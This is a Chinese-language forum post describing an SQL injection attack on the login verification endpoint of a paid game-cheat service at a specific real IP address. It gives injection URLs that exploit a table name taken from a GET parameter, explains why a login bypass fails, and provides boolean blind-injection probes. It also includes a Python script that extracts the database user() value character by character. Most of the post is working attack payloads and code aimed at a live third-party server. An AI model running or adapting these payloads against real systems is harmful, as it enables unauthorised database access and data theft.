來源：http://bbs.ichunqiu.com/thread-10120-1-1.html?from=ch

上傳遇到一收費外掛，登錄處抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX&sid=32F91605-CA92228F

返回這么一個字符串

經(jīng)過測試過濾了單引號，奇葩的是SQL語句中的表名是通過$_GET獲取的，這樣就不需要單引號注入了

但是問題又來了，這里是登錄處的注入，按理說可以萬能密碼進(jìn)去的，但是輸入http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1=1+--+&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX&sid=32F91605-CA92228F

他媽的從select語句變成了update語句，當(dāng)時有點懵，后來才想明白，這是因為登錄不止執(zhí)行了一條SQL語句，還會執(zhí)行update語句更新收費會員的信息，這樣萬能密碼就繞不過去了，還是得想辦法跑數(shù)據(jù)啊。SQLMAP應(yīng)該是不能識別這種注入點的。

http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ascii(mid(version(),1,1))=53,1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM條件成立時返回的頁面

http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ascii(mid(version(),1,1))=54,1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM條件不成立時返回的頁面

寫了個python腳本。

[Python]純文本查看復(fù)制代碼

import urllib2

import re

opener = urllib2.build_opener()

opener.addheaders.append(('Cookie', 'ZDEDebuggerPresent=php,phtml,php3'))

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

user = ""

for i in range(1,31):

for p in payloads:

s1 = "%s" %(i)

s2 = "%s" %(ord(p))

s = "http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ord(mid(user(),"+s1+",1))="+s2+",1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM"

try:

req = urllib2.Request(s)

req_data=opener.open(req,timeout=20)

#print req_data.read()

if re.findall('fa27f303f2dc7138a4a05578daf7e4ac',req_data.read()):

user+=p

print '\n user is:',user,

else:

print '.',

except urllib2.URLError,e:

break

最后打個廣告，mysql時間盲注教科書地址:

http://www.f0rg3t.com/post/1de4895e_a4c9d97